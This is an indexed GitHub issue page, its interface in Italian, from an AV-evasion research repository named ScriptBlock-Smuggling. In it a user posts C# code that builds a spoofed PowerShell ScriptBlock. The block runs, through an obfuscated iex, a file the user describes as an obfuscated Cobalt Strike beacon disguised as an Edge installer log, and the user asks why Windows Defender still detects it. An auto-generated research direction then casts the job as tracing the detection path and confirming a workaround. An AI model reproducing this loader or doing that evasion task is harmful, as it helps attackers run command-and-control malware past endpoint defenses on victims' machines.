BC-SECURITY / BC-SECURITY/ScriptBlock-Smuggling
Still be detected by wdfdr...
- Lingua principale
- C#
- Stelle
- 96
- Fork
- 13
- Metriche di merge delle PR
- Nessuna PR unita negli ultimi 30g
Descrizione
A very nice anti-detection idea, however my sample still can be detected by Windows Defender, here is the demo code:
```csharp
...
namespace ScriptSmuggling
{
public class Program
{
public static void Main()
{
// the msedge_installer.log is an obfuscated cobaltstrike beacon file (.ps1). it can be execute by iex
string script = @". ($pShOmE[4]+$PsHoMe[34]+'X') (cat C:\Windows\Temp\msedge_installer.log)";
ScriptBlock sb = BuildSpoofedBlock(script);
// Setup PowerShell runspace
using (Runspace runSpace = RunspaceFactory.CreateRunspace())
{
runSpace.Open();
using (PowerShell ps = PowerShell.Create())
{
ps.Runspace = runSpace;
ps.AddCommand("Invoke-Command")
.AddParameter("ScriptBlock", sb);
Collection results = ps.Invoke();
foreach (PSObject result in results)
{
Console.WriteLine(result);
}
// Display any errors from the error stream
foreach (ErrorRecord error in ps.Streams.Error)
{
Console.WriteLine("ERROR: " + error);
}
}
}
}
public static ScriptBlock BuildSpoofedBlock(string content)
{
...
}
}
}
```
Maybe the `executableAst` is still be check by wdfdr?
Guida per i contributori
Nessuna guida per i contributori indicizzata per questo repository
Direzione di ricerca
Non vengono indicati file del repository né test. Inizia riproducendo l’esempio C# fornito con Windows Defender, quindi traccia il modo in cui vengono gestiti ScriptBlock ed executableAst generati; il lavoro è completato quando il percorso di rilevamento è stato identificato e viene registrata una soluzione confermata o la limitazione rimanente.
Scritto dal modello di indicizzazione a partire dal testo della issue.
Valutazione
- Stack tecnologico
- csharp, powershell
- Ambito
- security
- Tipo di issue
- Bug
- Difficoltà
- 4/5
- Tempo stimato
- 3-5 giorni
- Stato di attività
- Ferma
- Chiarezza
- Da chiarire
- Idoneità per principianti
- 25/100